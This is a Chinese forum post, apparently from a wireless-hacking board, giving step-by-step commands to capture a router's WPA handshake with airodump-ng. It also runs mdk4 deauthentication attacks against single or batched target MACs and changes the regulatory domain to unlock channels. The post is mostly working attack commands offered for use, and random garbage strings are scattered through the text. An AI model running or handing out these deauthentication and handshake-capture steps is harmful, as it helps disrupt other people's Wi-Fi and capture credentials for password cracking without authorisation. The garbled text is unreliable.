少校
- 注册时间
- 2013-3-19
- 金币
- 1972 个
- 威望
- 19 个
- 荣誉
- 0 个
累计签到:107 天 连续签到:1 天 [LV.200]无线新星
|
本帖最后由 xun73tian 于 2025-3-12 16:13 编辑
* C2 ?. i9 `6 ^' o6 W& B% W9 E9 v8 E
airodump-ng抓包步骤:单网卡! V! ? @, O; X. k9 A6 |- l
一、终端一:选择攻击的路由
# h/ n0 u# Y& ]- O1 L1 \systemctl stop NetworkManager1 F; \$ Z7 j( a8 o
airmon-ng check kill
`/ W! _; @' `* v6 p- W/ P9 siw reg get (查看国家监管域,默认为00)" f2 }. z9 }- Z5 \! B( k1 l. O
iw reg set IN (临时设置全局国家监管域为IN)
2 f& C& S' g7 m! Q1 a$ t3 S或者
N' R# T+ F% s$ i0 ^ K# Riw reg set PA7 Q2 X; [. x. T7 `, x" h! [1 o9 K
9 y- G! n/ T+ x5 J3 d8 H; |. `iwconfig (查看无线网卡信息)7 H) Z. t. O9 z: q6 k8 |; {
airmon-ng start wlan1 (开启无线网卡监听模式)
9 g3 Y8 u9 }7 W, I# [airodump-ng wlan1 --band a (扫描5.0G的路由)
% }/ U* x6 i5 ^* x/ r或者
! F& }; P! u* \. Y1 kairodump-ng wlan1 --band bg (扫描2.4G的路由)
4 K. o* ]6 T( o5 I! n5 Y7 o( J7 X. E7 H8 Q3 {% F
airodump-ng -w 包命名 -c 信道 --bssid 路由地址 wlan1$ l1 ^$ S$ T% g* m# C
//抓取握手包,被动抓包(适应于2.4G和5.0G)
8 t% T2 W+ P0 |+ ~/ J( @# W# W5 o- c8 e: Q: M
二、终端二:mdk4攻击+ G4 S& |6 G; m( O
mdk4 wlan1 d -B 路由地址 (攻击具体路由)
1 F1 M) F$ ~" f }
, Z4 u( p/ b* P( I/ k) dmdk4批量攻击路由:补充. [0 X% \7 d9 O
把要攻击的目标MAC写入到/root/1.txt文本中。
' `) O" [; t& _/ ]2 Z8 eecho 6C:B1:58:E8:0C:60 >1.txt (覆盖输入)% F- S/ z2 m- ?2 h9 T2 i( Z
echo 6C:B1:58:E8:0C:61 >>1.txt (追加输入)1 Y1 J% [3 N# a
mdk4 wlan1 d -b ./1.txt (可同时攻击2.4和5G) |
|